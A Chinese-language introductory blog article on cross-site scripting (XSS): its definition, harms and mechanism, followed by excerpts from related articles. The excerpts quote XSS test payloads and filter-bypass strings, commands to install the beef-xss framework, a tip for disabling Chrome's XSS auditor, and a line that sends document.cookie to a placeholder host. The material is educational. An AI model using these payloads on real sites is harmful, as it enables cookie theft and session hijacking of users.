XSS的相關知識

2020-09-09 Java武學秘籍

XSS 簡介

人們經常將跨站腳本攻擊(Cross Site Scripting)縮寫為CSS,但這會與層疊樣式表(Cascading Style Sheets,CSS)的縮寫混淆。因此,有人將跨站腳本攻擊縮寫為XSS

跨站腳本攻擊(XSS),是最普遍的Web應用安全漏洞。這類漏洞能夠使得攻擊者嵌入惡意腳本代碼到正常用戶會訪問到的頁面中,當正常用戶訪問該頁面時,則可導致嵌入的惡意腳本代碼的執行,從而達到惡意攻擊用戶的目的。

攻擊者可以使用戶在瀏覽器中執行其預定義的惡意腳本,其導致的危害可想而知,如劫持用戶會話,插入惡意內容、重定向用戶、使用惡意軟體劫持用戶瀏覽器、繁殖XSS蠕蟲,甚至破壞網站、修改路由器配置信息等。


XSS 危害

1.網絡釣魚,包括盜取各類用戶帳號;

2.竊取用戶cookies資料,從而獲取用戶隱私信息,或利用用戶身份進一步對網站執行操作;

3.劫持用戶(瀏覽器)會話,從而執行任意操作,例如進行非法轉帳、強制發表日誌、發送電子郵件等;

4.強制彈出廣告頁面、刷流量等;

5.網頁掛馬;

6.進行惡意操作,例如任意篡改頁面信息、刪除文章等;

7.進行大量的客戶端攻擊,如DDoS攻擊;

8.結合其他漏洞,如CSRF漏洞,實施進一步作惡;

9.傳播跨站腳本蠕蟲等。


盜取各類用戶帳號權限(控制所盜竊權限數據內容),如機器登錄帳號、用戶網銀帳號、各類管理員帳號控制企業數據,包括讀取、篡改、添加、刪除企業敏感數據的能力基於XSS的跨站業務請求(如:非法轉帳、非法下單、非法轉載/發表內容、發送電子郵件、利用管理員身份提權掛馬、控制受害者機器向其它網站發起攻擊等)形成持久化APT攻擊,長期控制網站業務中樞利用跨站業務形成蠕蟲病毒式傳播劫持網站,劫持後可用於釣魚、偽裝、跳轉、掛廣告等,屬掛馬類型

XSS跨站腳本,是一種Web安全漏洞,有趣是是他並不像SQL注入等攻擊手段攻擊服務端,本身對Web伺服器沒有危害,攻擊的對象是客戶端,使用瀏覽器訪問這些惡意地址的網民。


XSS 原理

HTML是一種超文本標記語言,通過將一些字符特殊地對待來區別文本和標記,例如,小於符號(<)被看作是HTML標籤的開始,<title>與</title>之間的字符是頁面的標題等等。當動態頁面中插入的內容含有這些特殊字符(如<)時,用戶瀏覽器會將其誤認為是插入了HTML標籤,當這些HTML標籤引入了一段JavaScript腳本時,這些腳本程序就將會在用戶瀏覽器中執行。所以,當這些特殊字符不能被動態頁面檢查或檢查出現失誤時,就將會產生XSS漏洞。



主要的攻擊是在HTML中加入了JavaScript腳本,這個腳本可能會寫一些發起攻擊的代碼。

標籤中,或者標籤的屬性中都可以加入腳本。詳情看下面《XSS的原理分析與解剖》博文說明。

XSS攻擊:xss就是在頁面執行你想要的js,只要能允許JS,就能獲取cookie(設置http-only除外),就能發起一些事件操作等。


註:評論內容摘要

1、chrome內核與ie內核不一樣,chrome的過濾機制比ie強。現在測試xss一般都拿能過chrome的為主

2、現在的chrome瀏覽器默認開啟了xss過濾機制,可以通過關閉該機制來進行xss測試,方法如下: windows下,右鍵桌面中的&34;快捷鍵,然後在目標選項,chrome.exe後面加上參數:--args --disable-xss-auditor即可。


XSS 的本質是:惡意代碼未經過濾,與網站正常的代碼混在一起;瀏覽器無法分辨哪些腳本是可信的,導致惡意腳本被執行。

相關焦點

  • 「炒乾貨」XSS知識總結
    同源策略對Web應用程式具有特殊意義,因為Web應用程式廣泛依賴於HTTP cookie來維持用戶會話,所以必須將不相關網站嚴格分隔,以防止丟失數據洩露。值得注意的是同源策略僅適用於腳本,這意味著某網站可以通過相應的HTML標籤訪問不同來源網站上的圖像、CSS和動態加載腳本等資源。而跨站請求偽造就是利用同源策略不適用於HTML標籤的缺陷。
  • Csrf+Xss組合拳
    0x02這個站簡單的先用手機看了下,這種網課站我感覺xss比較好尋找一些,所以我找到的都是一些存儲型xss,先看一下第一個基本沒鳥用的xss用戶個人資料處更改姓名成功顯示彈窗經測試1.學號2.身份3.學校4.姓名處均存在存儲型xss
  • XSS(跨站腳本攻擊)內容總結整理
    本文來自工作的一個知識資料整理,收集網上的一些資料(我覺得還不錯的內容),如果你對XSS還不了解或者了解但不知道原理的話,建議閱讀一下,最好把參考的資料也閱讀一下,因為公眾號內不能打開連結,可以點擊 閱讀原文查看。
  • Spring Boot XSS 攻擊過濾插件使用
    xss 攻擊流程簡單 xss 攻擊示例若網站某個表單沒做相關的處理,用戶提交相關惡意代碼,瀏覽器會執行相關的代碼。對 json 字符串數據進行 xss 處理。提供路由和控制器方法級別的放行規則。使用 mica-xss引入一下 依賴即可<!
  • XSS攻擊的原理
    諸如此類,唯一能完全杜絕xss攻擊的方法,就是禁用script,img等,顯然這是不靠譜的,用戶需要豐富的頁面內容;當然我們可以用一些方法預防xss攻擊,儘量減少xss造成的危害。><iframe src=javascript:alert(『xss – gotcha!』)
  • Web滲透測試(XSS)
    (/xss/);</script> <script>confirm(/xss/);</script> <script>confirm(&39;);</script> <script>prompt(&39;);</script> <sCr<scrscRiptipt>ipt>OonN&34;<
  • 經驗分享 | XSS手工利用方式
    XSS前言在面對xss漏洞的時候,筆者通常會簡單的找個xss平臺,插入一段平臺的xss代碼,盜取個cookie,就自以為是的認為自己掌握了xss漏洞。這篇文章旨在拋開xss漏洞平臺,從簡單利用原始碼的角度,分享一下如何利用xss獲取用戶的cookie信息。在實際滲透中,筆者通過自己寫利用代碼的方式,先後運用xss實現了挖礦、簡單的DDOS攻擊測試、獲取cookie、內網埠、截屏等。聲明:本文僅涉及技術討論,請勿用於任何非法用途!
  • PHP安全篇之XSS攻擊
    $_GET['username'];}上面代碼直接使用了$_GET['username']參數,並沒有做任何的過濾與檢查,存在明顯的xss漏洞。漏洞利用:輸入<script>alert(/xss/)</script>後,成功彈窗。
  • 搭建自己的xss平臺
    環境php7.4kali 2020 (apache + mysql)安裝首先下載源碼git clone https://github.com/78778443/xssplatform.git將其放到var/www/html也可以自行在kali中配置虛擬主機。
  • XSS語義分析的階段性總結(二)
    前言上次分享了javascript語義分析,並且簡單介紹了新型xss掃描器的一些想法,如何在不進行大量fuzz的情況下又能準確的檢測出xss漏洞,這其中我們又可以儘量的避免觸發waf的xss防護功能!關聯文章:XSS語義分析的階段性總結(一)首先先接著上文介紹一下html語義分析的方法。
  • XSS繞過及防禦(Web漏洞及防禦)
    意識性不強觸發惡意代碼的手段多樣,無法做到完全防禦XSS漏洞注入點多樣XSS漏洞的危害攻擊者通過注入如alert(/xss/)之類的JS代碼來證明XSS漏洞的存在性,但沒有真實地反映其危害性!<input onfocus=alert(/xss/) autofocus>
  • 白帽黑客教你Kali:XSS攻擊隨便打開一個網站被控制的秘密
    命令:apt install beef-xss3.3 如下圖所示,beef-xss滲透框架安裝完成。滲透框架相關的命令,如下圖所示。命令:beef-xss3.6 beef-xss滲透框架啟動成功,如下圖所示。
  • 白帽黑客教你Kali:XSS攻擊隨便打開一個網站被控制的秘密
    命令:services apache2 start3.2 在攻擊者Kali 主機安裝beef-xss滲透框架,如下圖所示。命令:apt install beef-xss3.3 如下圖所示,beef-xss滲透框架安裝完成。3.4 熟悉跟beef-xss滲透框架相關的命令,如下圖所示。
  • XSS漏洞篇——JavaScript簡單講解
    我們在利用xss漏洞的時候,構造執行自己目的的效果的JavaScript代碼去獲取cookie、釣魚、掛馬、植入廣告等等,我們必須學習一些相關的JavaScript基礎,才對xss漏洞進行更深的利用。屬性是與對象相關的值,訪問對象屬於的語法是:objectName.propertyName示例
  • XSS:原理、攻擊、防禦
    例子:比如我再論壇發帖子,帖子包含惡意代碼location.href='http://www.xss.comcookie='+document.cookie』;或者<a href='http://www.xss.com?cookie='+document.cookie>。用戶的cookie我也拿到了,如果服務端session沒有設置過期的話,我以後甚至拿這個cookie而不需用戶名密碼,就可以以這個用戶的身份登錄成功了。
  • 一些BAT的XSS實例(一)
    http://px1624.sinaapp.com/test/xsstest1/http://px1624.sinaapp.com/test/xsstest2/http://px1624.sinaapp.com/test/xsstest3/http://px1624.sinaapp.com/test/xsstest4/
  • 淺談 React 中的 XSS 攻擊
    query=<img src=&34; onerror =&39;xss&34;>// 該 URL 將導致以下響應,並運行 alert(&39;):<p>您搜索的是: <img src=&34; onerror =&39;xss&34;></p>// 如果有用戶請求攻擊者的
  • 視圖層wxml和wxss文件
    圖3-2 wxss文件圖3-3 js文件中data的設置如圖所示,直接設置組件的屬性id="item-{{id}}",然後在js文件中的data文件中給出id的具體值,在wxss文件中改變對應id組件的屬性(關於wxss文件中id屬性的選擇器
  • Glxss:一款便宜的國產Google Glass
    左邊Glxss,右邊Google GlassGlxss比Glass(注意,一個是「x」一個是「a」)要大一些同時重一些(5g),鏡框的設計也有很大不同,前者可以摺疊,Glass則不行;Glass用的是骨傳導技術
  • XSS 攻擊入門基礎
    但是,當她輸入了不正常的關鍵詞時,例如 <script>alert(『xss』)</script>,點擊搜索按鈕後,出現了一個提示有 「xss」 的彈窗,頁面上展示 「 not found」。此時 URL 為 http://bobssite.org/search?